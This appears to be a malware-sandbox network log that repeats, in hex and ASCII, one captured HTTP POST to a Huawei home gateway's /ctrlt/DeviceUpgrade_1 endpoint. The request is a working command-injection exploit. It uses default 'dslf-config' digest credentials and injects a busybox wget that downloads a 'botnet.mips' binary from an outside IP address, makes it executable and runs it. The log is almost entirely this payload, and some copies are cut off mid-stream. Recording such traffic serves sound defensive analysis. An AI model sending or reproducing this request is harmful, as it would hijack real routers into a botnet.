      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima hua
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 